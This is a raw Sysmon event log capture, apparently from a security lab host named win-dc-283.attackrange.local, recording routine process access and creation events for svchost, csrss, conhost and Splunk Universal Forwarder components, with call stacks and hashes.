16:06:07.933{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-54EF-6008-D506-00000000A301}7196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54EF-6008-D506-00000000A301}7196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.934{7901BC46-54EF-6008-D506-00000000A301}7196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54EF-6008-D406-00000000A301}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-54EF-6008-D406-00000000A301}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.261{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54EF-6008-D406-00000000A301}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.262{7901BC46-54EF-6008-D406-00000000A301}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54F0-6008-D606-00000000A301}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-54F0-6008-D606-00000000A301}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.605{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54F0-6008-D606-00000000A301}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.606{7901BC46-54F0-6008-D606-00000000A301}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:08.074{7901BC46-54EF-6008-D506-00000000A301}71967104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.683{7901BC46-54F1-6008-D706-00000000A301}68405772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54F1-6008-D706-00000000A301}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-54F1-6008-D706-00000000A301}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54F1-6008-D706-00000000A301}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 